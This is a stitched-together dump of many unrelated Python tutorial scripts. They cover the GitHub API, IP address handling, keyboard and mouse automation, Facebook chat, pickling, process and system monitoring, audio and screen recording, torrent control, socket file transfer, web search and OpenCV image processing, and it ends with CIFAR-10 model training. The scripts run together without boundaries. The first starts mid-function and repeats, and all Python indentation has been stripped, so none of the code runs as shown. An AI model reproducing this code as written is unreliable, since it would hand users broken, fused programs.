# number of stars
print("Number of stars:", repo.stargazers_count)
print("-"*50)
# repository content (files & directories)
print("Contents:")
for content in repo.get_contents(""):
print(content)
try:
# repo license
print("License:", base64.b64decode(repo.get_license().content.encode()).decode())
except:
pass
# Github username from the command line
username = sys.argv[1]
# pygithub object
g = Github()
# get that user by username
user = g.get_user(username)
# iterate over all public repositories
for repo in user.get_repos():
print_repo(repo)
print("="*100)
from github import Github
import base64
def print_repo(repo):
# repository full name
print("Full name:", repo.full_name)
# repository description
print("Description:", repo.description)
# the date of when the repo was created
print("Date created:", repo.created_at)
# the date of the last git push
print("Date of last push:", repo.pushed_at)
# home website (if available)
print("Home Page:", repo.homepage)
# programming language
print("Language:", repo.language)
# number of forks
print("Number of forks:", repo.forks)
# number of stars
print("Number of stars:", repo.stargazers_count)
print("-"*50)
# repository content (files & directories)
print("Contents:")
for content in repo.get_contents(""):
print(content)
try:
# repo license
print("License:", base64.b64decode(repo.get_license().content.encode()).decode())
except:
pass
# your github account credentials
username = "username"
password = "password"
# initialize github object
g = Github(username, password)
# or use public version
# g = Github()
# search repositories by name
for repo in g.search_repositories("pythoncode tutorials"):
# print repository details
print_repo(repo)
print("="*100)
print("="*100)
print("="*100)
# search by programming language
for i, repo in enumerate(g.search_repositories("language:python")):
print_repo(repo)
print("="*100)
if i == 9:
break
import ipaddress
# initialize an IPv4 Address
ip = ipaddress.IPv4Address("192.168.1.1")
# print True if the IP address is global
print("Is global:", ip.is_global)
# print Ture if the IP address is Link-local
print("Is link-local:", ip.is_link_local)
# ip.is_reserved
# ip.is_multicast
# next ip address
print(ip + 1)
# previous ip address
print(ip - 1)
# initialize an IPv4 Network
network = ipaddress.IPv4Network("192.168.1.0/24")
# get the network mask
print("Network mask:", network.netmask)
# get the broadcast address
print("Broadcast address:", network.broadcast_address)
# print the number of IP addresses under this network
print("Number of hosts under", str(network), ":", network.num_addresses)
# iterate over all the hosts under this network
print("Hosts under", str(network), ":")
for host in network.hosts():
print(host)
# iterate over the subnets of this network
print("Subnets:")
for subnet in network.subnets(prefixlen_diff=2):
print(subnet)
# get the supernet of this network
print("Supernet:", network.supernet(prefixlen_diff=1))
# prefixlen_diff: An integer, the amount the prefix length of
# the network should be decreased by. For example, given a
# /24 network and a prefixlen_diff of 3, a supernet with a
# /21 netmask is returned.
# tell if this network is under (or overlaps) 192.168.0.0/16
print("Overlaps 192.168.0.0/16:", network.overlaps(ipaddress.IPv4Network("192.168.0.0/16")))
import keyboard
# registering a hotkey that replaces one typed text with another
# replaces every "email" followed by a space with my actual email
keyboard.add_abbreviation("email", "rockikzthepythoncode.com")
# invokes a callback everytime a hotkey is pressed
keyboard.add_hotkey("ctrl+alt+p", lambda: print("CTRL+ALT+P Pressed!"))
# check if a ctrl is pressed
print(keyboard.is_pressed('ctrl'))
# press space
keyboard.send("space")
# sends artificial keyboard events to the OS
# simulating the typing of a given text
# setting 0.1 seconds to wait between keypresses to look fancy
keyboard.write("Python Programming is always fun!", delay=0.1)
# record all keyboard clicks until esc is clicked
events = keyboard.record('esc')
# play these events
keyboard.play(events)
# remove all keyboard hooks in use
keyboard.unhook_all()
from fbchat import Client
from fbchat.models import Message, MessageReaction
# facebook user credentials
username = "username.or.email"
password = "password"
# login
client = Client(username, password)
# get 20 users you most recently talked to
users = client.fetchThreadList()
print(users)
# get the detailed informations about these users
detailed_users = [ list(client.fetchThreadInfo(user.uid).values())[0] for user in users ]
# sort by number of messages
sorted_detailed_users = sorted(detailed_users, key=lambda u: u.message_count, reverse=True)
# print the best friend!
best_friend = sorted_detailed_users[0]
print("Best friend:", best_friend.name, "with a message count of", best_friend.message_count)
# message the best friend!
client.send(Message(
text=f"Congratulations {best_friend.name}, you are my best friend with {best_friend.message_count} messages!"
),
thread_id=best_friend.uid)
# get all users you talked to in messenger in your account
all_users = client.fetchAllUsers()
print("You talked with a total of", len(all_users), "users!")
# let's logout
client.logout()
import mouse
# left click
mouse.click('left')
# right click
mouse.click('right')
# middle click
mouse.click('middle')
# get the position of mouse
print(mouse.get_position())
# In [12]: mouse.get_position()
# Out[12]: (714, 488)
# presses but doesn't release
mouse.hold('left')
# mouse.press('left')
# drag from (0, 0) to (100, 100) relatively with a duration of 0.1s
mouse.drag(0, 0, 100, 100, absolute=False, duration=0.1)
# whether a button is clicked
print(mouse.is_pressed('right'))
# move 100 right & 100 down
mouse.move(100, 100, absolute=False, duration=0.2)
# make a listener when left button is clicked
mouse.on_click(lambda: print("Left Button clicked."))
# make a listener when right button is clicked
mouse.on_right_click(lambda: print("Right Button clicked."))
# remove the listeners when you want
mouse.unhook_all()
# scroll down
mouse.wheel(-1)
# scroll up
mouse.wheel(1)
# record until you click right
events = mouse.record()
# replay these events
mouse.play(events[:-1])
import pickle
# define any Python data structure including lists, sets, tuples, dicts, etc.
l = list(range(10000))
# save it to a file
with open("list.pickle", "wb") as file:
pickle.dump(l, file)
# load it again
with open("list.pickle", "rb") as file:
unpickled_l = pickle.load(file)
print("unpickled_l == l: ", unpickled_l == l)
print("unpickled l is l: ", unpickled_l is l)
import pickle
class Person:
def __init__(self, first_name, last_name, age, gender):
self.first_name = first_name
self.last_name = last_name
self.age = age
self.gender = gender
def __str__(self):
return f"<Person name={self.first_name} {self.last_name}, age={self.age}, gender={self.gender}>"
p = Person("John", "Doe", 99, "Male")
# save the object
with open("person.pickle", "wb") as file:
pickle.dump(p, file)
# load the object
with open("person.pickle", "rb") as file:
p2 = pickle.load(file)
print(p)
print(p2)
import pickle
class Person:
def __init__(self, first_name, last_name, age, gender):
self.first_name = first_name
self.last_name = last_name
self.age = age
self.gender = gender
def __str__(self):
return f"<Person name={self.first_name} {self.last_name}, age={self.age}, gender={self.gender}>"
p = Person("John", "Doe", 99, "Male")
# get the dumped bytes
dumped_p = pickle.dumps(p)
print(dumped_p)
# write them to a file
with open("person.pickle", "wb") as file:
file.write(dumped_p)
# load it
with open("person.pickle", "rb") as file:
p2 = pickle.loads(file.read())
print(p)
print(p2)
import camelot
import sys
# PDF file to extract tables from (from command-line)
file = sys.argv[1]
# extract all the tables in the PDF file
tables = camelot.read_pdf(file)
# number of tables extracted
print("Total tables extracted:", tables.n)
# print the first table as Pandas DataFrame
print(tables[0].df)
# export individually
tables[0].to_csv("foo.csv")
# or export all in a zip
tables.export("foo.csv", f="csv", compress=True)
# export to HTML
tables.export("foo.html", f="html")
import psutil
from datetime import datetime
import pandas as pd
import time
import os
def get_size(bytes):
"""
Returns size of bytes in a nice format
"""
for unit in ['', 'K', 'M', 'G', 'T', 'P']:
if bytes < 1024:
return f"{bytes:.2f}{unit}B"
bytes /= 1024
def get_processes_info():
# the list the contain all process dictionaries
processes = []
for process in psutil.process_iter():
# get all process info in one shot
with process.oneshot():
# get the process id
pid = process.pid
if pid == 0:
# System Idle Process for Windows NT, useless to see anyways
continue
# get the name of the file executed
name = process.name()
# get the time the process was spawned
try:
create_time = datetime.fromtimestamp(process.create_time())
except OSError:
# system processes, using boot time instead
create_time = datetime.fromtimestamp(psutil.boot_time())
try:
# get the number of CPU cores that can execute this process
cores = len(process.cpu_affinity())
except psutil.AccessDenied:
cores = 0
# get the CPU usage percentage
cpu_usage = process.cpu_percent()
# get the status of the process (running, idle, etc.)
status = process.status()
try:
# get the process priority (a lower value means a more prioritized process)
nice = int(process.nice())
except psutil.AccessDenied:
nice = 0
try:
# get the memory usage in bytes
memory_usage = process.memory_full_info().uss
except psutil.AccessDenied:
memory_usage = 0
# total process read and written bytes
io_counters = process.io_counters()
read_bytes = io_counters.read_bytes
write_bytes = io_counters.write_bytes
# get the number of total threads spawned by this process
n_threads = process.num_threads()
# get the username of user spawned the process
try:
username = process.username()
except psutil.AccessDenied:
username = "N/A"
processes.append({
'pid': pid, 'name': name, 'create_time': create_time,
'cores': cores, 'cpu_usage': cpu_usage, 'status': status, 'nice': nice,
'memory_usage': memory_usage, 'read_bytes': read_bytes, 'write_bytes': write_bytes,
'n_threads': n_threads, 'username': username,
})
return processes
def construct_dataframe(processes):
# convert to pandas dataframe
df = pd.DataFrame(processes)
# set the process id as index of a process
df.set_index('pid', inplace=True)
# sort rows by the column passed as argument
df.sort_values(sort_by, inplace=True, ascending=not descending)
# pretty printing bytes
df['memory_usage'] = df['memory_usage'].apply(get_size)
df['write_bytes'] = df['write_bytes'].apply(get_size)
df['read_bytes'] = df['read_bytes'].apply(get_size)
# convert to proper date format
df['create_time'] = df['create_time'].apply(datetime.strftime, args=("%Y-%m-%d %H:%M:%S",))
# reorder and define used columns
df = df[columns.split(",")]
return df
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="Process Viewer & Monitor")
parser.add_argument("-c", "--columns", help="""Columns to show,
available are name,create_time,cores,cpu_usage,status,nice,memory_usage,read_bytes,write_bytes,n_threads,username.
Default is name,cpu_usage,memory_usage,read_bytes,write_bytes,status,create_time,nice,n_threads,cores.""",
default="name,cpu_usage,memory_usage,read_bytes,write_bytes,status,create_time,nice,n_threads,cores")
parser.add_argument("-s", "--sort-by", dest="sort_by", help="Column to sort by, default is memory_usage .", default="memory_usage")
parser.add_argument("--descending", action="store_true", help="Whether to sort in descending order.")
parser.add_argument("-n", help="Number of processes to show, will show all if 0 is specified, default is 25 .", default=25)
parser.add_argument("-u", "--live-update", action="store_true", help="Whether to keep the program on and updating process information each second")
# parse arguments
args = parser.parse_args()
columns = args.columns
sort_by = args.sort_by
descending = args.descending
n = int(args.n)
live_update = args.live_update
# print the processes for the first time
processes = get_processes_info()
df = construct_dataframe(processes)
if n == 0:
print(df.to_string())
elif n > 0:
print(df.head(n).to_string())
# print continuously
while live_update:
# get all process info
processes = get_processes_info()
df = construct_dataframe(processes)
# clear the screen depending on your OS
os.system("cls") if "nt" in os.name else os.system("clear")
if n == 0:
print(df.to_string())
elif n > 0:
print(df.head(n).to_string())
time.sleep(0.7)
from playsound import playsound
import sys
playsound(sys.argv[1])
import pyaudio
import wave
import sys
filename = sys.argv[1]
# set the chunk size of 1024 samples
chunk = 1024
# open the audio file
wf = wave.open(filename, "rb")
# initialize PyAudio object
p = pyaudio.PyAudio()
# open stream object
stream = p.open(format=p.get_format_from_width(wf.getsampwidth()),
channels=wf.getnchannels(),
rate=wf.getframerate(),
output=True)
# read data in chunks
data = wf.readframes(chunk)
# writing to the stream (playing audio)
while data:
stream.write(data)
data = wf.readframes(chunk)
# close stream
stream.close()
p.terminate()
from pydub import AudioSegment
from pydub.playback import play
import sys
# read MP3 file
song = AudioSegment.from_mp3(sys.argv[1])
# song = AudioSegment.from_wav("audio_file.wav")
# you can also read from other formats such as MP4
# song = AudioSegment.from_file("audio_file.mp4", "mp4")
play(song)
import pyaudio
import wave
import argparse
parser = argparse.ArgumentParser(description="an Audio Recorder using Python")
parser.add_argument("-o", "--output", help="Output file (with .wav)", default="recorded.wav")
parser.add_argument("-d", "--duration", help="Duration to record in seconds (can be float)", default=5)
args = parser.parse_args()
# the file name output you want to record into
filename = args.output
# number of seconds to record
record_seconds = float(args.duration)
# set the chunk size of 1024 samples
chunk = 1024
# sample format
FORMAT = pyaudio.paInt16
# mono, change to 2 if you want stereo
channels = 1
# 44100 samples per second
sample_rate = 44100
# initialize PyAudio object
p = pyaudio.PyAudio()
# open stream object as input & output
stream = p.open(format=FORMAT,
channels=channels,
rate=sample_rate,
input=True,
output=True,
frames_per_buffer=chunk)
frames = []
print("Recording...")
for i in range(int(44100 / chunk * record_seconds)):
data = stream.read(chunk)
# if you want to hear your voice while recording
# stream.write(data)
frames.append(data)
print("Finished recording.")
# stop and close stream
stream.stop_stream()
stream.close()
# terminate pyaudio object
p.terminate()
# save audio file
# open the file in 'write bytes' mode
wf = wave.open(filename, "wb")
# set the channels
wf.setnchannels(channels)
# set the sample format
wf.setsampwidth(p.get_sample_size(FORMAT))
# set the sample rate
wf.setframerate(sample_rate)
# write the frames as bytes
wf.writeframes(b"".join(frames))
# close the file
wf.close()
import cv2
import numpy as np
import pyautogui
# display screen resolution, get it from your OS settings
SCREEN_SIZE = (1920, 1080)
# define the codec
fourcc = cv2.VideoWriter_fourcc(*"MJPG")
# create the video write object
out = cv2.VideoWriter("output.avi", fourcc, 10.0, (SCREEN_SIZE))
# while True:
for i in range(100):
# make a screenshot
img = pyautogui.screenshot()
# convert these pixels to a proper numpy array to work with OpenCV
frame = np.array(img)
# convert colors from BGR to RGB
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
# write the frame
out.write(frame)
# show the frame
# cv2.imshow("screenshot", frame)
# if the user clicks q, it exits
if cv2.waitKey(1) == ord("q"):
break
# make sure everything is closed when exited
cv2.destroyAllWindows()
out.release()
import psutil
import platform
from datetime import datetime
def get_size(bytes, suffix="B"):
"""
Scale bytes to its proper format
e.g:
1253656 => '1.20MB'
1253656678 => '1.17GB'
"""
factor = 1024
for unit in ["", "K", "M", "G", "T", "P"]:
if bytes < factor:
return f"{bytes:.2f}{unit}{suffix}"
bytes /= factor
print("="*40, "System Information", "="*40)
uname = platform.uname()
print(f"System: {uname.system}")
print(f"Node Name: {uname.node}")
print(f"Release: {uname.release}")
print(f"Version: {uname.version}")
print(f"Machine: {uname.machine}")
print(f"Processor: {uname.processor}")
# Boot Time
print("="*40, "Boot Time", "="*40)
boot_time_timestamp = psutil.boot_time()
bt = datetime.fromtimestamp(boot_time_timestamp)
print(f"Boot Time: {bt.year}/{bt.month}/{bt.day} {bt.hour}:{bt.minute}:{bt.second}")
# let's print CPU information
print("="*40, "CPU Info", "="*40)
# number of cores
print("Physical cores:", psutil.cpu_count(logical=False))
print("Total cores:", psutil.cpu_count(logical=True))
# CPU frequencies
cpufreq = psutil.cpu_freq()
print(f"Max Frequency: {cpufreq.max:.2f}Mhz")
print(f"Min Frequency: {cpufreq.min:.2f}Mhz")
print(f"Current Frequency: {cpufreq.current:.2f}Mhz")
# CPU usage
print("CPU Usage Per Core:")
for i, percentage in enumerate(psutil.cpu_percent(percpu=True, interval=1)):
print(f"Core {i}: {percentage}%")
print(f"Total CPU Usage: {psutil.cpu_percent()}%")
# Memory Information
print("="*40, "Memory Information", "="*40)
# get the memory details
svmem = psutil.virtual_memory()
print(f"Total: {get_size(svmem.total)}")
print(f"Available: {get_size(svmem.available)}")
print(f"Used: {get_size(svmem.used)}")
print(f"Percentage: {svmem.percent}%")
print("="*20, "SWAP", "="*20)
# get the swap memory details (if exists)
swap = psutil.swap_memory()
print(f"Total: {get_size(swap.total)}")
print(f"Free: {get_size(swap.free)}")
print(f"Used: {get_size(swap.used)}")
print(f"Percentage: {swap.percent}%")
# Disk Information
print("="*40, "Disk Information", "="*40)
print("Partitions and Usage:")
# get all disk partitions
partitions = psutil.disk_partitions()
for partition in partitions:
print(f"=== Device: {partition.device} ===")
print(f" Mountpoint: {partition.mountpoint}")
print(f" File system type: {partition.fstype}")
try:
partition_usage = psutil.disk_usage(partition.mountpoint)
except PermissionError:
# this can be catched due to the disk that
# isn't ready
continue
print(f" Total Size: {get_size(partition_usage.total)}")
print(f" Used: {get_size(partition_usage.used)}")
print(f" Free: {get_size(partition_usage.free)}")
print(f" Percentage: {partition_usage.percent}%")
# get IO statistics since boot
disk_io = psutil.disk_io_counters()
print(f"Total read: {get_size(disk_io.read_bytes)}")
print(f"Total write: {get_size(disk_io.write_bytes)}")
# Network information
print("="*40, "Network Information", "="*40)
# get all network interfaces (virtual and physical)
if_addrs = psutil.net_if_addrs()
for interface_name, interface_addresses in if_addrs.items():
for address in interface_addresses:
print(f"=== Interface: {interface_name} ===")
if str(address.family) == 'AddressFamily.AF_INET':
print(f" IP Address: {address.address}")
print(f" Netmask: {address.netmask}")
print(f" Broadcast IP: {address.broadcast}")
elif str(address.family) == 'AddressFamily.AF_PACKET':
print(f" MAC Address: {address.address}")
print(f" Netmask: {address.netmask}")
print(f" Broadcast MAC: {address.broadcast}")
# get IO statistics since boot
net_io = psutil.net_io_counters()
print(f"Total Bytes Sent: {get_size(net_io.bytes_sent)}")
print(f"Total Bytes Received: {get_size(net_io.bytes_recv)}")
from qbittorrent import Client
# connect to the qbittorent Web UI
qb = Client("http://127.0.0.1:8080/")
# put the credentials (as you configured)
qb.login("admin", "adminadmin")
# open the torrent file of the file you wanna download
torrent_file = open("debian-10.2.0-amd64-netinst.iso.torrent", "rb")
# start downloading
qb.download_from_file(torrent_file)
# this magnet is not valid, replace with yours
# magnet_link = "magnet:?xt=urn:btih:e334ab9ddd91c10938a7....."
# qb.download_from_link(magnet_link)
# you can specify the save path for downloads
# qb.download_from_file(torrent_file, savepath="/the/path/you/want/to/save")
# pause all downloads
qb.pause_all()
# resume them
qb.resume_all()
def get_size_format(b, factor=1024, suffix="B"):
"""
Scale bytes to its proper byte format
e.g:
1253656 => '1.20MB'
1253656678 => '1.17GB'
"""
for unit in ["", "K", "M", "G", "T", "P", "E", "Z"]:
if b < factor:
return f"{b:.2f}{unit}{suffix}"
b /= factor
return f"{b:.2f}Y{suffix}"
# return list of torrents
torrents = qb.torrents()
for torrent in torrents:
print("Torrent name:", torrent["name"])
print("hash:", torrent["hash"])
print("Seeds:", torrent["num_seeds"])
print("File size:", get_size_format(torrent["total_size"]))
print("Download speed:", get_size_format(torrent["dlspeed"]) + "/s")
# Torrent name: debian-10.2.0-amd64-netinst.iso
# hash: 86d4c80024a469be4c50bc5a102cf71780310074
# Seeds: 70
# File size: 335.00MB
# Download speed: 606.15KB/s
"""
Client that sends the file (uploads)
"""
import socket
import tqdm
import os
import argparse
SEPARATOR = "<SEPARATOR>"
BUFFER_SIZE = 1024 * 4
def send_file(filename, host, port):
# get the file size
filesize = os.path.getsize(filename)
# create the client socket
s = socket.socket()
print(f"[+] Connecting to {host}:{port}")
s.connect((host, port))
print("[+] Connected.")
# send the filename and filesize
s.send(f"{filename}{SEPARATOR}{filesize}".encode())
# start sending the file
progress = tqdm.tqdm(range(filesize), f"Sending {filename}", unit="B", unit_scale=True, unit_divisor=1024)
with open(filename, "rb") as f:
for _ in progress:
# read the bytes from the file
bytes_read = f.read(BUFFER_SIZE)
if not bytes_read:
# file transmitting is done
break
# we use sendall to assure transimission in
# busy networks
s.sendall(bytes_read)
# update the progress bar
progress.update(len(bytes_read))
# close the socket
s.close()
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="Simple File Sender")
parser.add_argument("file", help="File name to send")
parser.add_argument("host", help="The host/IP address of the receiver")
parser.add_argument("-p", "--port", help="Port to use, default is 5001", default=5001)
args = parser.parse_args()
filename = args.file
host = args.host
port = args.port
send_file(filename, host, port)
"""
Server receiver of the file
"""
import socket
import tqdm
import os
# device's IP address
SERVER_HOST = "0.0.0.0"
SERVER_PORT = 5001
# receive 4096 bytes each time
BUFFER_SIZE = 4096
SEPARATOR = "<SEPARATOR>"
# create the server socket
# TCP socket
s = socket.socket()
# bind the socket to our local address
s.bind((SERVER_HOST, SERVER_PORT))
# enabling our server to accept connections
# 5 here is the number of unaccepted connections that
# the system will allow before refusing new connections
s.listen(5)
print(f"[*] Listening as {SERVER_HOST}:{SERVER_PORT}")
# accept connection if there is any
client_socket, address = s.accept()
# if below code is executed, that means the sender is connected
print(f"[+] {address} is connected.")
# receive the file infos
# receive using client socket, not server socket
received = client_socket.recv(BUFFER_SIZE).decode()
filename, filesize = received.split(SEPARATOR)
# remove absolute path if there is
filename = os.path.basename(filename)
# convert to integer
filesize = int(filesize)
# start receiving the file from the socket
# and writing to the file stream
progress = tqdm.tqdm(range(filesize), f"Receiving {filename}", unit="B", unit_scale=True, unit_divisor=1024)
with open(filename, "wb") as f:
for _ in progress:
# read 1024 bytes from the socket (receive)
bytes_read = client_socket.recv(BUFFER_SIZE)
if not bytes_read:
# nothing is received
# file transmitting is done
break
# write to the file the bytes we just received
f.write(bytes_read)
# update the progress bar
progress.update(len(bytes_read))
# close the client socket
client_socket.close()
# close the server socket
s.close()
import requests
import sys
# get the API KEY here: https://developers.google.com/custom-search/v1/overview
API_KEY = "<INSERT_YOUR_API_KEY_HERE>"
# get your Search Engine ID on your CSE control panel
SEARCH_ENGINE_ID = "<INSERT_YOUR_SEARCH_ENGINE_ID_HERE>"
# the search query you want, from the command line
query = sys.argv[1]
# constructing the URL
# doc: https://developers.google.com/custom-search/v1/using_rest
url = f"https://www.googleapis.com/customsearch/v1?key={API_KEY}&cx={SEARCH_ENGINE_ID}&q={query}"
# make the API request
data = requests.get(url).json()
# get the result items
search_items = data.get("items")
# iterate over 10 results found
for i, search_item in enumerate(search_items, start=1):
# get the page title
title = search_item.get("title")
# page snippet
snippet = search_item.get("snippet")
# alternatively, you can get the HTML snippet (bolded keywords)
html_snippet = search_item.get("htmlSnippet")
# extract the page url
link = search_item.get("link")
# print the results
print("="*10, f"Result #{i}", "="*10)
print("Title:", title)
print("Description:", snippet)
print("URL:", link, "\n")
import cv2
import matplotlib.pyplot as plt
import sys
# read the image
image = cv2.imread(sys.argv[1])
# convert to RGB
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
# convert to grayscale
gray = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)
# create a binary thresholded image
_, binary = cv2.threshold(gray, int(sys.argv[2]), 255, cv2.THRESH_BINARY_INV)
# show it
plt.imshow(binary, cmap="gray")
plt.show()
# find the contours from the thresholded image
contours, hierarchy = cv2.findContours(binary, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
# draw all contours
image = cv2.drawContours(image, contours, -1, (0, 255, 0), 2)
# show the image with the drawn contours
plt.imshow(image)
plt.show()
import cv2
cap = cv2.VideoCapture(0)
while True:
_, frame = cap.read()
# convert to grayscale
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
# create a binary thresholded image
_, binary = cv2.threshold(gray, 255 // 2, 255, cv2.THRESH_BINARY_INV)
# find the contours from the thresholded image
contours, hierarchy = cv2.findContours(binary, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
# draw all contours
image = cv2.drawContours(frame, contours, -1, (0, 255, 0), 2)
# show the images
cv2.imshow("gray", gray)
cv2.imshow("image", image)
cv2.imshow("binary", binary)
if cv2.waitKey(1) == ord("q"):
break
cap.release()
cv2.destroyAllWindows()
import cv2
import numpy as np
import matplotlib.pyplot as plt
import sys
# read the image
image = cv2.imread(sys.argv[1])
# convert it to grayscale
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
# show the grayscale image, if you want to show, uncomment 2 below lines
# plt.imshow(gray, cmap="gray")
# plt.show()
# perform the canny edge detector to detect image edges
edges = cv2.Canny(gray, threshold1=30, threshold2=100)
# show the detected edges
plt.imshow(edges, cmap="gray")
plt.show()
import numpy as np
import cv2
cap = cv2.VideoCapture(0)
while True:
_, frame = cap.read()
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
edges = cv2.Canny(gray, 30, 100)
cv2.imshow("edges", edges)
cv2.imshow("gray", gray)
if cv2.waitKey(1) == ord("q"):
break
cap.release()
cv2.destroyAllWindows()
import cv2
# loading the test image
image = cv2.imread("kids.jpg")
# converting to grayscale
image_gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
# initialize the face recognizer (default face haar cascade)
face_cascade = cv2.CascadeClassifier("cascades/haarcascade_fontalface_default.xml")
# detect all the faces in the image
faces = face_cascade.detectMultiScale(image_gray, 1.3, 5)
# print the number of faces detected
print(f"{len(faces)} faces detected in the image.")
# for every face, draw a blue rectangle
for x, y, width, height in faces:
cv2.rectangle(image, (x, y), (x + width, y + height), color=(255, 0, 0), thickness=2)
# save the image with rectangles
cv2.imwrite("kids_detected.jpg", image)
import cv2
# create a new cam object
cap = cv2.VideoCapture(0)
# initialize the face recognizer (default face haar cascade)
face_cascade = cv2.CascadeClassifier("cascades/haarcascade_fontalface_default.xml")
while True:
# read the image from the cam
_, image = cap.read()
# converting to grayscale
image_gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
# detect all the faces in the image
faces = face_cascade.detectMultiScale(image_gray, 1.3, 5)
# for every face, draw a blue rectangle
for x, y, width, height in faces:
cv2.rectangle(image, (x, y), (x + width, y + height), color=(255, 0, 0), thickness=2)
cv2.imshow("image", image)
if cv2.waitKey(1) == ord("q"):
break
cap.release()
cv2.destroyAllWindows()
from train import load_data, batch_size
from tensorflow.keras.models import load_model
import matplotlib.pyplot as plt
import numpy as np
# CIFAR-10 classes
categories = {
0: "airplane",
1: "automobile",
2: "bird",
3: "cat",
4: "deer",
5: "dog",
6: "frog",
7: "horse",
8: "ship",
9: "truck"
}
# load the testing set
# (_, _), (X_test, y_test) = load_data()
ds_train, ds_test, info = load_data()
# load the model with final model weights
model = load_model("results/cifar10-model-v1.h5")
# evaluation
loss, accuracy = model.evaluate(ds_test, steps=info.splits["test"].num_examples // batch_size)
print("Test accuracy:", accuracy*100, "%")
# get prediction for this image
data_sample = next(iter(ds_test))
sample_image = data_sample[0].numpy()[0]
sample_label = categories[data_sample[1].numpy()[0]]
prediction = np.argmax(model.predict(sample_image.reshape(-1, *sample_image.shape))[0])
print("Predicted label:", categories[prediction])
print("True label:", sample_label)
# show the first image
plt.axis('off')
plt.imshow(sample_image)
plt.show()
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, Dropout, Activation, Flatten
from tensorflow.keras.layers import Conv2D, MaxPooling2D
from tensorflow.keras.callbacks import TensorBoard
import tensorflow as tf
import tensorflow_datasets as tfds
import os
# hyper-parameters
batch_size = 64
# 10 categories of images (CIFAR-10)
num_classes = 10
# number of training epochs
epochs = 30
def create_model(input_shape):
"""
Constructs the model:
- 32 Convolutional (3x3)
- Relu
- 32 Convolutional (3x3)
- Relu
- Max pooling (2x2)
- Dropout
- 64 Convolutional (3x3)
- Relu
- 64 Convolutional (3x3)
- Relu
- Max pooling (2x2)
- Dropout
- 128 Convolutional (3x3)
- Relu
- 128 Convolutional (3x3)
- Relu
- Max pooling (2x2)
- Dropout
- Flatten (To make a 1D vector out of convolutional layers)
- 1024 Fully connected units
- Relu
- Dropout
- 10 Fully connected units (each corresponds to a label category (cat, dog, etc.))
"""
# building the model
model = Sequential()
model.add(Conv2D(filters=32, kernel_size=(3, 3), padding="same", input_shape=input_shape))
model.add(Activation("relu"))
model.add(Conv2D(filters=32, kernel_size=(3, 3), padding="same"))
model.add(Activation("relu"))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.25))
model.add(Conv2D(filters=64, kernel_size=(3, 3), padding="same"))
model.add(Activation("relu"))
model.add(Conv2D(filters=64, kernel_size=(3, 3), padding="same"))
model.add(Activation("relu"))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.25))
model.add(Conv2D(filters=128, kernel_size=(3, 3), padding="same"))
model.add(Activation("relu"))
model.add(Conv2D(filters=128, kernel_size=(3, 3), padding="same"))
model.add(Activation("relu"))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.25))
# flattening the convolutions
model.add(Flatten())
# fully-connected layers
model.add(Dense(1024))
model.add(Activation("relu"))
model.add(Dropout(0.5))
model.add(Dense(num_classes, activation="softmax"))
# print the summary of the model architecture
model.summary()
# training the model using adam optimizer
model.compile(loss="sparse_categorical_crossentropy", optimizer="adam", metrics=["accuracy"])
return model
def load_data():
"""
This function loads CIFAR-10 dataset, and preprocess it
"""
# Loading data using Keras
# loading the CIFAR-10 dataset, splitted between train and test sets
# (X_train, y_train), (X_test, y_test) = cifar10.load_data()
# print("Training samples:", X_train.shape[0])
# print("Testing samples:", X_test.shape[0])
# print(f"Images shape: {X_train.shape[1:]}")
# # converting image labels to binary class matrices
# y_train = to_categorical(y_train, num_classes)
# y_test = to_categorical(y_test, num_classes)
# # convert to floats instead of int, so we can divide by 255
# X_train = X_train.astype("float32")
# X_test = X_test.astype("float32")
# X_train /= 255
# X_test /= 255
# return (X_train, y_train), (X_test, y_test)
# Loading data using Tensorflow Datasets
def preprocess_image(image, label):
# convert [0, 255] range integers to [0, 1] range floats
image = tf.image.convert_image_dtype(image, tf.float32)
return image, label
# loading the CIFAR-10 dataset, splitted between train and test sets
ds_train, info = tfds.load("cifar10", with_info=True, split="train", as_supervised=True)
ds_test = tfds.load("cifar10", split="test", as_supervised=True)
# repeat dataset forever, shuffle, preprocess, split by batch
ds_train = ds_train.repeat().shuffle(1024).map(preprocess_image).batch(batch_size)
ds_test = ds_test.repeat().shuffle(1024).map(preprocess_image).batch(batch_size)
return ds_train, ds_test, info
if __name__ == "__main__":
# load the data
ds_train, ds_test, info = load_data()
# (X_train, y_train), (X_test, y_test) = load_data()
# constructs the model
# model = create_model(input_shape=X_train.shape[1:])
model = create_model(input_shape=info.features["image"].shape)
# some nice callbacks
logdir = os.path.join("logs", "cifar10-model-v1")
tensorboard = TensorBoard(log_dir=logdir)
# make sure results folder exist
if not os.path.isdir("results"):
os.mkdir("results")
# train
# model.fit(X_train, y_train,
# batch_size=batch_size,
# epochs=epochs,
# validation_data=(X_test, y_test),
# callbacks=[tensorboard, checkpoint],
# shuffle=True)
model.fit(ds_train, epochs=epochs, validation_data=ds_test, verbose=1,
steps_per_epoch=info.splits["train"].num_examples // batch_size,
validation_steps=info.splits["test"].num_examples // batch_size,
callbacks=[tensorboard])
# save the model to disk
model.save("results/cifar10-model-v1.h5")
from train import load_data, create_model, IMAGE_SHAPE, batch_size, np
import matplotlib.pyplot as plt
# load the data generators
train_generator, validation_generator, class_names = load_data()
# constructs the model
model = create_model(input_shape=IMAGE_SHAPE)
# load the optimal weights
model.load_weights("results/MobileNetV2_finetune_last5_less_lr-loss-0.45-acc-0.86.h5")
validation_steps_per_epoch = np.ceil(validation_generator.samples / batch_size)
# print the validation loss & accuracy
evaluation = model.evaluate_generator(validation_generator, steps=validation_steps_per_epoch, verbose=1)
print("Val loss:", evaluation[0])
